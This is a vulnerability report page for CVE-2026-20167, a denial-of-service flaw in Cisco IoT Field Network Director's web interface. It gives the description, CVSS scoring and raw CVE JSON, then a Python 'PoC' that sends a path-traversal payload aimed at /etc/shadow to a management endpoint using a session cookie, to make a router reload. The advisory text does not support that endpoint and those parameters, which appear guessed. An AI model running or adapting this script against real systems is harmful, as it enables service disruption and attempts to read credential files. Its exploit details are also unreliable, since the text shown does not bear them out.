Security Vulnerability Report
中文
CVE-2026-20167 CVSS 7.7 HIGH

CVE-2026-20167

Published: 2026-05-06 17:16:20
Last Modified: 2026-05-06 18:59:53
Source: [email protected]

Description

A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to cause a DoS condition on a remotely managed router. This vulnerability is due to improper error handling. An attacker could exploit this vulnerability by submitting crafted input to the web-based management interface. A successful exploit could allow the attacker to request unauthorized files from a remote router, causing the router to reload and resulting in a DoS condition.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Cisco IoT Field Network Director (具体受影响版本请参考Cisco Security Advisory cisco-sa-iot-fnd-dos-n8N26Q4u)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Cisco IoT Field Network Director DoS PoC (CVE-2026-20167) # Description: Triggers unauthorized file request causing router reload. TARGET_URL = "https://<target-ip>/webui/api/manage" SESSION_COOKIE = "<low_priv_auth_cookie>" def exploit_dos(): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Cookie": f"JSESSIONID={SESSION_COOKIE}" } # Malicious payload to trigger improper error handling # Attempting to request unauthorized files leading to DoS payload = { "fileReq": "/../../../../../etc/shadow", "action": "export_config" } try: print(f"[+] Sending payload to {TARGET_URL}...") response = requests.post(TARGET_URL, data=payload, headers=headers, verify=False, timeout=5) if response.status_code == 200 or response.status_code == 500: print("[+] Payload sent successfully. Check router status for DoS condition.") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Connection error (Router may have reloaded): {e}") if __name__ == "__main__": exploit_dos()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20167", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:20.433", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to cause a DoS condition on a remotely managed router.\r\n\r\nThis vulnerability is due to improper error handling. An attacker could exploit this vulnerability by submitting crafted input to the web-based management interface. A successful exploit could allow the attacker to request unauthorized files from a remote router, causing the router to reload and resulting in a DoS condition."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iot-fnd-dos-n8N26Q4u", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.